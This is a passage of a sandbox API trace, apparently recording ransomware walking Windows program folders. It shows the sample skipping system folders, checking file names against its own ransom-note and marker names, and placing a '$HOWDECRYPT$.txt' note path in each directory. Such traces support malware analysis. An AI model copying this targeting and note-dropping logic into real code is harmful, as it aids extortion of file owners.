returned -1 [0091.662] lstrlenW (lpString="Windows") returned 7 [0091.662] lstrcmpiW (lpString1="FPWEC.DLL", lpString2="$Recycle.bin") returned 1 [0091.662] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.662] lstrcmpiW (lpString1="FPWEC.DLL", lpString2="System Volume Information") returned -1 [0091.663] lstrlenW (lpString="System Volume Information") returned 25 [0091.663] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPWEC.DLL") returned 89 [0091.663] StrStrIW (lpFirst="FPWEC.DLL", lpSrch=".spyhunter") returned 0x0 [0091.663] lstrcmpW (lpString1="FPWEC.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.663] lstrcmpW (lpString1="FPWEC.DLL", lpString2="_uninstalling_.png") returned 1 [0091.663] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPWEC.DLL") returned 89 [0091.663] GetProcessHeap () returned 0x2c0000 [0091.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf4) returned 0x35a160 [0091.663] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1598) returned 0x2c310e0 [0091.663] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0 [0091.663] FindClose (in: hFindFile=0x335fe0 | out: hFindFile=0x335fe0) returned 1 [0091.663] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\$HOWDECRYPT$.txt") returned 96 [0091.663] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\$HOWDECRYPT$.txt") returned 96 [0091.663] GetProcessHeap () returned 0x2c0000 [0091.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x102) returned 0x37b110 [0091.663] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15a0) returned 0x2c310e0 [0091.663] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0091.663] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0091.664] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\$HOWDECRYPT$.txt") returned 92 [0091.664] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\$HOWDECRYPT$.txt") returned 92 [0091.664] GetProcessHeap () returned 0x2c0000 [0091.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xfa) returned 0x37b220 [0091.664] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15a8) returned 0x2c310e0 [0091.665] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0 [0091.665] FindClose (in: hFindFile=0x335f60 | out: hFindFile=0x335f60) returned 1 [0091.665] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\$HOWDECRYPT$.txt") returned 89 [0091.665] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\$HOWDECRYPT$.txt") returned 89 [0091.665] GetProcessHeap () returned 0x2c0000 [0091.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf4) returned 0x35a260 [0091.665] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15b0) returned 0x2c310e0 [0091.665] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0 [0091.665] FindClose (in: hFindFile=0x335f20 | out: hFindFile=0x335f20) returned 1 [0091.666] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\$HOWDECRYPT$.txt") returned 67 [0091.666] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\$HOWDECRYPT$.txt") returned 67 [0091.666] GetProcessHeap () returned 0x2c0000 [0091.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x358200 [0091.666] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15b8) returned 0x2c310e0 [0091.666] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0091.666] lstrcmpiW (lpString1="Services", lpString2="Windows") returned -1 [0091.667] lstrlenW (lpString="Windows") returned 7 [0091.667] lstrcmpiW (lpString1="Services", lpString2="$Recycle.bin") returned 1 [0091.667] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.667] lstrcmpiW (lpString1="Services", lpString2="System Volume Information") returned -1 [0091.667] lstrlenW (lpString="System Volume Information") returned 25 [0091.667] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Services") returned 42 [0091.667] lstrcmpW (lpString1="Services", lpString2=".") returned 1 [0091.667] lstrcmpW (lpString1="Services", lpString2="..") returned 1 [0091.667] GetProcessHeap () returned 0x2c0000 [0091.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0091.667] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Services\\*") returned 44 [0091.667] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Services\\*", lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0x335f20 [0091.668] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.668] lstrlenW (lpString="Windows") returned 7 [0091.668] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.668] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.668] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.668] lstrlenW (lpString="System Volume Information") returned 25 [0091.668] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Services\\.") returned 44 [0091.668] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.668] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0091.668] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.668] lstrlenW (lpString="Windows") returned 7 [0091.668] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.668] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.668] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.668] lstrlenW (lpString="System Volume Information") returned 25 [0091.668] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Services\\..") returned 45 [0091.668] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.668] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.669] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0091.669] lstrcmpiW (lpString1="verisign.bmp", lpString2="Windows") returned -1 [0091.669] lstrlenW (lpString="Windows") returned 7 [0091.669] lstrcmpiW (lpString1="verisign.bmp", lpString2="$Recycle.bin") returned 1 [0091.669] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.669] lstrcmpiW (lpString1="verisign.bmp", lpString2="System Volume Information") returned 1 [0091.669] lstrlenW (lpString="System Volume Information") returned 25 [0091.669] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 55 [0091.669] StrStrIW (lpFirst="verisign.bmp", lpSrch=".spyhunter") returned 0x0 [0091.669] lstrcmpW (lpString1="verisign.bmp", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.669] lstrcmpW (lpString1="verisign.bmp", lpString2="_uninstalling_.png") returned 1 [0091.669] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 55 [0091.669] GetProcessHeap () returned 0x2c0000 [0091.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb0) returned 0x329dd8 [0091.669] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15c0) returned 0x2c310e0 [0091.669] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0 [0091.669] FindClose (in: hFindFile=0x335f20 | out: hFindFile=0x335f20) returned 1 [0091.669] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Services\\$HOWDECRYPT$.txt") returned 59 [0091.669] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Services\\$HOWDECRYPT$.txt") returned 59 [0091.669] GetProcessHeap () returned 0x2c0000 [0091.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb8) returned 0x34c8d8 [0091.670] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15c8) returned 0x2c310e0 [0091.670] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0091.670] lstrcmpiW (lpString1="SpeechEngines", lpString2="Windows") returned -1 [0091.670] lstrlenW (lpString="Windows") returned 7 [0091.670] lstrcmpiW (lpString1="SpeechEngines", lpString2="$Recycle.bin") returned 1 [0091.670] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.670] lstrcmpiW (lpString1="SpeechEngines", lpString2="System Volume Information") returned -1 [0091.670] lstrlenW (lpString="System Volume Information") returned 25 [0091.670] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines") returned 47 [0091.670] lstrcmpW (lpString1="SpeechEngines", lpString2=".") returned 1 [0091.670] lstrcmpW (lpString1="SpeechEngines", lpString2="..") returned 1 [0091.670] GetProcessHeap () returned 0x2c0000 [0091.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0091.670] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\*") returned 49 [0091.670] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\*", lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0x335f20 [0091.670] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.670] lstrlenW (lpString="Windows") returned 7 [0091.671] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.671] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.671] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.671] lstrlenW (lpString="System Volume Information") returned 25 [0091.671] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\.") returned 49 [0091.671] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.671] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0091.671] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.671] lstrlenW (lpString="Windows") returned 7 [0091.671] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.671] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.671] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.671] lstrlenW (lpString="System Volume Information") returned 25 [0091.671] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\..") returned 50 [0091.671] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.671] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.671] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0091.671] lstrcmpiW (lpString1="Microsoft", lpString2="Windows") returned -1 [0091.671] lstrlenW (lpString="Windows") returned 7 [0091.671] lstrcmpiW (lpString1="Microsoft", lpString2="$Recycle.bin") returned 1 [0091.671] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.671] lstrcmpiW (lpString1="Microsoft", lpString2="System Volume Information") returned -1 [0091.671] lstrlenW (lpString="System Volume Information") returned 25 [0091.671] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft") returned 57 [0091.671] lstrcmpW (lpString1="Microsoft", lpString2=".") returned 1 [0091.672] lstrcmpW (lpString1="Microsoft", lpString2="..") returned 1 [0091.672] GetProcessHeap () returned 0x2c0000 [0091.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30efc0 [0091.672] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\*") returned 59 [0091.672] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\*", lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0x335f60 [0091.673] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.673] lstrlenW (lpString="Windows") returned 7 [0091.673] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.673] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.673] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.673] lstrlenW (lpString="System Volume Information") returned 25 [0091.673] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\.") returned 59 [0091.673] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.673] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.674] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.674] lstrlenW (lpString="Windows") returned 7 [0091.674] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.674] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.674] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.674] lstrlenW (lpString="System Volume Information") returned 25 [0091.674] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\..") returned 60 [0091.674] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.674] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.674] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.674] lstrcmpiW (lpString1="TTS20", lpString2="Windows") returned -1 [0091.674] lstrlenW (lpString="Windows") returned 7 [0091.674] lstrcmpiW (lpString1="TTS20", lpString2="$Recycle.bin") returned 1 [0091.674] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.674] lstrcmpiW (lpString1="TTS20", lpString2="System Volume Information") returned 1 [0091.674] lstrlenW (lpString="System Volume Information") returned 25 [0091.674] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20") returned 63 [0091.674] lstrcmpW (lpString1="TTS20", lpString2=".") returned 1 [0091.674] lstrcmpW (lpString1="TTS20", lpString2="..") returned 1 [0091.674] GetProcessHeap () returned 0x2c0000 [0091.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c20090 [0091.675] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*") returned 65 [0091.675] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0091.675] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.675] lstrlenW (lpString="Windows") returned 7 [0091.675] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.675] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.675] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.675] lstrlenW (lpString="System Volume Information") returned 25 [0091.675] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\.") returned 65 [0091.676] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.676] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.676] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.676] lstrlenW (lpString="Windows") returned 7 [0091.676] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.676] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.676] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.676] lstrlenW (lpString="System Volume Information") returned 25 [0091.676] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\..") returned 66 [0091.676] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.676] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.676] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.676] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0091.676] lstrlenW (lpString="Windows") returned 7 [0091.676] lstrcmpiW (lpString1="en-US", lpString2="$Recycle.bin") returned 1 [0091.676] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.676] lstrcmpiW (lpString1="en-US", lpString2="System Volume Information") returned -1 [0091.676] lstrlenW (lpString="System Volume Information") returned 25 [0091.676] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US") returned 69 [0091.676] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0091.676] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0091.676] GetProcessHeap () returned 0x2c0000 [0091.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3867e8 [0091.677] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*") returned 71 [0091.677] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*", lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0x335fe0 [0091.678] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.678] lstrlenW (lpString="Windows") returned 7 [0091.678] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.678] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.678] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.678] lstrlenW (lpString="System Volume Information") returned 25 [0091.678] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\.") returned 71 [0091.678] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.678] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0091.678] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.678] lstrlenW (lpString="Windows") returned 7 [0091.678] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.678] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.678] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.678] lstrlenW (lpString="System Volume Information") returned 25 [0091.679] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\..") returned 72 [0091.679] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.679] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.679] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0091.679] lstrcmpiW (lpString1="enu-dsk", lpString2="Windows") returned -1 [0091.679] lstrlenW (lpString="Windows") returned 7 [0091.679] lstrcmpiW (lpString1="enu-dsk", lpString2="$Recycle.bin") returned 1 [0091.679] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.679] lstrcmpiW (lpString1="enu-dsk", lpString2="System Volume Information") returned -1 [0091.679] lstrlenW (lpString="System Volume Information") returned 25 [0091.679] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk") returned 77 [0091.679] lstrcmpW (lpString1="enu-dsk", lpString2=".") returned 1 [0091.679] lstrcmpW (lpString1="enu-dsk", lpString2="..") returned 1 [0091.679] GetProcessHeap () returned 0x2c0000 [0091.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x396830 [0091.679] wnsprintfW (in: pszDest=0x396830, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*") returned 79 [0091.679] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*", lpFindFileData=0x298e608 | out: lpFindFileData=0x298e608) returned 0x336020 [0091.680] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.680] lstrlenW (lpString="Windows") returned 7 [0091.680] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.680] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.680] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.680] lstrlenW (lpString="System Volume Information") returned 25 [0091.680] wnsprintfW (in: pszDest=0x396830, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\.") returned 79 [0091.680] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.680] FindNextFileW (in: hFindFile=0x336020, lpFindFileData=0x298e608 | out: lpFindFileData=0x298e608) returned 1 [0091.680] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.680] lstrlenW (lpString="Windows") returned 7 [0091.680] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.680] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.681] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.681] lstrlenW (lpString="System Volume Information") returned 25 [0091.681] wnsprintfW (in: pszDest=0x396830, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\..") returned 80 [0091.681] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.681] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.681] FindNextFileW (in: hFindFile=0x336020, lpFindFileData=0x298e608 | out: lpFindFileData=0x298e608) returned 0 [0091.681] FindClose (in: hFindFile=0x336020 | out: hFindFile=0x336020) returned 1 [0091.681] wnsprintfW (in: pszDest=0x396830, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\$HOWDECRYPT$.txt") returned 94 [0091.681] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\$HOWDECRYPT$.txt") returned 94 [0091.681] GetProcessHeap () returned 0x2c0000 [0091.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xfe) returned 0x381880 [0091.681] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15d0) returned 0x2c310e0 [0091.681] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0091.681] lstrcmpiW (lpString1="MSTTSFrontendENU.dll", lpString2="Windows") returned -1 [0091.681] lstrlenW (lpString="Windows") returned 7 [0091.682] lstrcmpiW (lpString1="MSTTSFrontendENU.dll", lpString2="$Recycle.bin") returned 1 [0091.682] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.682] lstrcmpiW (lpString1="MSTTSFrontendENU.dll", lpString2="System Volume Information") returned -1 [0091.682] lstrlenW (lpString="System Volume Information") returned 25 [0091.682] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSFrontendENU.dll") returned 90 [0091.682] StrStrIW (lpFirst="MSTTSFrontendENU.dll", lpSrch=".spyhunter") returned 0x0 [0091.682] lstrcmpW (lpString1="MSTTSFrontendENU.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.682] lstrcmpW (lpString1="MSTTSFrontendENU.dll", lpString2="_uninstalling_.png") returned 1 [0091.682] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSFrontendENU.dll") returned 90 [0091.682] GetProcessHeap () returned 0x2c0000 [0091.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf6) returned 0x35a360 [0091.682] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15d8) returned 0x2c310e0 [0091.682] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0091.682] lstrcmpiW (lpString1="MSTTSLoc.dll.mui", lpString2="Windows") returned -1 [0091.682] lstrlenW (lpString="Windows") returned 7 [0091.682] lstrcmpiW (lpString1="MSTTSLoc.dll.mui", lpString2="$Recycle.bin") returned 1 [0091.682] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.682] lstrcmpiW (lpString1="MSTTSLoc.dll.mui", lpString2="System Volume Information") returned -1 [0091.682] lstrlenW (lpString="System Volume Information") returned 25 [0091.682] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSLoc.dll.mui") returned 86 [0091.682] StrStrIW (lpFirst="MSTTSLoc.dll.mui", lpSrch=".spyhunter") returned 0x0 [0091.682] lstrcmpW (lpString1="MSTTSLoc.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.682] lstrcmpW (lpString1="MSTTSLoc.dll.mui", lpString2="_uninstalling_.png") returned 1 [0091.683] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSLoc.dll.mui") returned 86 [0091.683] GetProcessHeap () returned 0x2c0000 [0091.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xee) returned 0x355698 [0091.683] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, 